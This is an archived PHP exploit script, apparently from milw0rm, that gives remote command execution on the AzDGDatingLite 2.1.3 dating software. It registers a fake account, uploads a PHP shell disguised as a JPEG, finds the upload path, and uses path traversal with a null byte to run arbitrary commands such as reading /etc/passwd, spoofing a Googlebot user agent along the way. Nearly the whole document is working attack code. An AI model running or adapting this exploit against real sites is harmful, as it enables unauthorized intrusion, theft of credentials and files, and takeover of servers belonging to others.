AzDGDatingLite V 2.1.3 (possibly prior versions) remote command execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /azdg/ or just /)

specify a port other than 80 (default value)

a Unix command, for example: ls -la to list directories, cat /etc/passwd to show the passwd file

send exploit through an HTTP proxy (ip:port)

'; function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $datai=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($datai)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$datai."".$datai."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacket($packet) { global $proxy, $host, $port, $html; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else { if (!eregi($proxy_regex,$proxy)) {echo htmlentities($proxy).' -> not a valid proxy...'; die; } $parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); echo nl2br(htmlentities($html)); } if (($path<>'') and ($host<>'') and ($command<>'')) { if ($port=='') {$port=80;} # step 1 -> register and upload the evil jpeg file srand(make_seed()); $anumber=rand(10000,99999); //do not modify absolutely CRLF and spaces here... $data='-----------------------------23281168279961 Content-Disposition: form-data; name="l" default -----------------------------23281168279961 Content-Disposition: form-data; name="a" a -----------------------------23281168279961 Content-Disposition: form-data; name="fname" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="lname" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="pass" jimihendrix'.$anumber.' -----------------------------23281168279961 Content-Disposition: form-data; name="rpass" jimihendrix'.$anumber.' 
-----------------------------23281168279961 Content-Disposition: form-data; name="month" 11 -----------------------------23281168279961 Content-Disposition: form-data; name="day" 27 -----------------------------23281168279961 Content-Disposition: form-data; name="year" 1942 -----------------------------23281168279961 Content-Disposition: form-data; name="gender" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="purpose" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="country" 158 -----------------------------23281168279961 Content-Disposition: form-data; name="email" jimihendrix'.$anumber.'@hotmail.com -----------------------------23281168279961 Content-Disposition: form-data; name="url" -----------------------------23281168279961 Content-Disposition: form-data; name="icq" -----------------------------23281168279961 Content-Disposition: form-data; name="aim" -----------------------------23281168279961 Content-Disposition: form-data; name="phone" -----------------------------23281168279961 Content-Disposition: form-data; name="city" -----------------------------23281168279961 Content-Disposition: form-data; name="marstat" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="child" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="height" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="weight" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="hcolor" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="ecolor" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="etnicity" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="religion" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="smoke" 0 -----------------------------23281168279961 
Content-Disposition: form-data; name="drink" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="education" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="job" -----------------------------23281168279961 Content-Disposition: form-data; name="hobby" -----------------------------23281168279961 Content-Disposition: form-data; name="descr" rock star -----------------------------23281168279961 Content-Disposition: form-data; name="sgender" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="setnicity" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="sreligion" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="agef" 14 -----------------------------23281168279961 Content-Disposition: form-data; name="aget" 60 -----------------------------23281168279961 Content-Disposition: form-data; name="heightf" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="heightt" 22 -----------------------------23281168279961 Content-Disposition: form-data; name="weightf" 1 -----------------------------23281168279961 Content-Disposition: form-data; name="weightt" 45 -----------------------------23281168279961 Content-Disposition: form-data; name="hdyfu" 0 -----------------------------23281168279961 Content-Disposition: form-data; name="file0"; filename="jimihendrix.gif" Content-Type: image/jpeg '; $shell=' README'."'".'); ?>'; $data.=$shell; $data.=' -----------------------------23281168279961 Content-Disposition: form-data; name="file1"; filename="" Content-Type: application/octet-stream -----------------------------23281168279961 Content-Disposition: form-data; name="file2"; filename="" Content-Type: application/octet-stream -----------------------------23281168279961--'; if ($proxy=='') {$packet="POST ".$path."/add.php HTTP/1.1\r\n";} else {$packet="POST http://".$host.$path."add.php 
HTTP/1.1\r\n";} $packet.="Host: ".$host."\r\n"; $packet.="User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\r\n"; $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Language: en-us,en;q=0.5\r\n"; $packet.="Accept-Encoding: gzip,deflate\r\n"; $packet.="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet.="Connection: close\r\n"; $packet.="Referer: http://".$host.$path."add.php?l=default\r\n"; $packet.="Cookie: PHPSESSID=13798fab78f7fa6e5bb501ac83329bdd\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------23281168279961\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n\r\n"; $packet.=$data; show($packet); sendpacket($packet); #step 2 -> retrieve upload subdir name and filename from index e profile page if ($proxy=='') {$packet="GET ".$path." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp='';$i=0; while (!eregi('jimihendrix'.$anumber,$temp)) { $temp.=$html[$i]; $i=$i+1; if (eregi('',$temp)) { die(" Exploit failed... ");} } $temp2=explode('retrieving shell path from /'.$profile.'

'; if ($proxy=='') {$packet="GET ".$path.$profile." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path.$profile." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); $temp='';$i=0; while (!eregi('jimihendrix'.$anumber,$temp)) { $temp.=$html[$i]; $i=$i+1; if (eregi('',$temp)) { die(" Exploit failed... ");} } $temp2=explode('
Ok,found... shell is at '.$shellfullpath.'

'; $temp=explode("/",$shellfullpath); $temp2=count($temp)-1; $subdir=$temp[$temp2-1]; $filename=$temp[$temp2]; # step 3 -> launch commands if ($proxy=='') {$packet="GET ".$path."include/security.inc.php?cmd=".urlencode($command)."&l=".urlencode("../../../members/uploads/".$subdir."/".$filename.chr(0x00))." HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."include/security.inc.php?cmd=".urlencode($command)."&l=".urlencode("../../../members/uploads/".$subdir."/".$filename.chr(0x00))." HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); # step 4 -> making a GET request for redirected output echo '
if AzDGDatingLite is unpatched and vulnerable now you will see '.htmlentities($command).'output...

'; if ($proxy=='') {$packet="GET ".$path."include/README HTTP/1.0 \r\n";} else {$packet="GET http://".$host.$path."include/README HTTP/1.0 \r\n";} $packet.="Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; show($packet); sendpacket($packet); } ?> # milw0rm.com [2005-09-13]